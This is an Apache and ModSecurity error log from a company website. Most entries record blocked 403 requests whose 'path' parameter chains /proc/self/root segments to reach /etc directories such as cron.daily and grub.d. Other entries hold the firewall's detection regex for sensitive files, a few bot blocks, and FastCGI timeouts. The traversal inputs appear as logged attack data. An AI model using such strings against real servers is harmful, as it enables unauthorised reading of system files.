[Tue Mar 17 20:20:12.182704 2026] [:error] [pid 16784:tid 140411557287680] [client 74.7.243.128:53332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnhrIbSUwQGapzuJ5swKgAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:20:20.125817 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58200] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:20:44.297890 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59086] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:21:06.145784 2026] [proxy_fcgi:error] [pid 29151:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59846] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:21:28.141828 2026] [proxy_fcgi:error] [pid 11088:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:60504] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:21:50.065845 2026] [proxy_fcgi:error] [pid 7004:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33084] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:22:13.149782 2026] [proxy_fcgi:error] [pid 7004:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33950] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:22:37.130350 2026] [proxy_fcgi:error] [pid 25836:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34752] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:22:44.418956 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.244.43:51278] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abniRMdf6f5d65gmYZRgzgAAAsg"]
[Tue Mar 17 20:22:52.903169 2026] [:error] [pid 2598:tid 140411548894976] [client 74.7.228.61:39964] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abniTBj0p0SRWAqcjGGd6gAAAxc"]
[Tue Mar 17 20:22:59.129788 2026] [proxy_fcgi:error] [pid 16449:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35432] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:23:03.487311 2026] [:error] [pid 17259:tid 140411716749056] [client 74.7.243.128:37840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abniVyGalZF7eRqLEoF_RAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:23:11.311036 2026] [:error] [pid 7004:tid 140411725141760] [client 74.7.243.128:57562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abniX8U6Sx0TG1YjmQjTkgAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:23:21.149781 2026] [proxy_fcgi:error] [pid 7004:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36186] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:23:43.153768 2026] [proxy_fcgi:error] [pid 7004:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36966] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:24:06.130379 2026] [proxy_fcgi:error] [pid 25836:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37970] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:24:27.125784 2026] [proxy_fcgi:error] [pid 19507:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:38842] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:24:49.100241 2026] [proxy_fcgi:error] [pid 7004:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39626] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:24:50.192717 2026] [:error] [pid 25836:tid 140411574073088] [client 74.7.243.128:37776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abniwoh-PF_25v4hFRCOhQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:24:56.348130 2026] [:error] [pid 2598:tid 140411548894976] [client 74.7.243.128:43202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abniyBj0p0SRWAqcjGGeAwAAAxc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:25:12.137873 2026] [proxy_fcgi:error] [pid 6296:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:40362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:25:13.357933 2026] [:error] [pid 16449:tid 140411674785536] [client 74.7.243.128:43218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abni2UeQbjTSjgbmHFr0OwAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:25:26.931237 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.243.128:38754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abni5vPqhzTj3BvfDX-s2AAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:25:35.153884 2026] [proxy_fcgi:error] [pid 17259:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41084] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:25:38.988985 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:41286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abni8uyqAr6etmhZHNpK2gAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:25:40.324331 2026] [:error] [pid 7004:tid 140411691570944] [client 74.7.243.128:41324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abni9MU6Sx0TG1YjmQjT0AAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:25:57.121820 2026] [proxy_fcgi:error] [pid 29151:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:41804] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:26:19.129859 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42470] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:26:25.233978 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.243.128:41336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnjIXIk7brgkOH-rIWxYAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:26:27.071821 2026] [:error] [pid 7004:tid 140411548894976] [client 74.7.243.128:59428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnjIsU6Sx0TG1YjmQjT5QAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:26:40.151013 2026] [proxy_fcgi:error] [pid 11088:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43200] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:27:02.845826 2026] [proxy_fcgi:error] [pid 25836:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44044] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:27:24.161821 2026] [proxy_fcgi:error] [pid 16449:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44934] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:27:45.529538 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.244.43:49752] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnjccdf6f5d65gmYZRhMgAAAsg"]
[Tue Mar 17 20:27:45.895312 2026] [:error] [pid 16784:tid 140411582465792] [client 74.7.243.128:59444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnjcYbSUwQGapzuJ5sw9gAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:27:47.093959 2026] [proxy_fcgi:error] [pid 11088:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45782] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:27:54.200382 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.228.61:58086] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnjenIk7brgkOH-rIWxagAAAVQ"]
[Tue Mar 17 20:28:10.895143 2026] [:error] [pid 17259:tid 140411666392832] [client 74.7.243.128:55308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnjiiGalZF7eRqLEoF_9wAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:28:13.897000 2026] [:error] [pid 11088:tid 140411699963648] [client 74.7.243.128:59904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnjjWmqtCojLHvu5cKN5QAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:28:14.153835 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46870] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:28:36.133802 2026] [proxy_fcgi:error] [pid 7004:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47650] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:28:45.706611 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.243.128:59916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnjrfPqhzTj3BvfDX-tDQAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:28:53.920837 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:48398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnjtdY0UrI5A3LftIwkAgAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:28:59.329820 2026] [proxy_fcgi:error] [pid 18540:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48218] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:29:23.245832 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48754] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:29:45.122395 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49208] AH01075: Error dispatching request to : (polling)
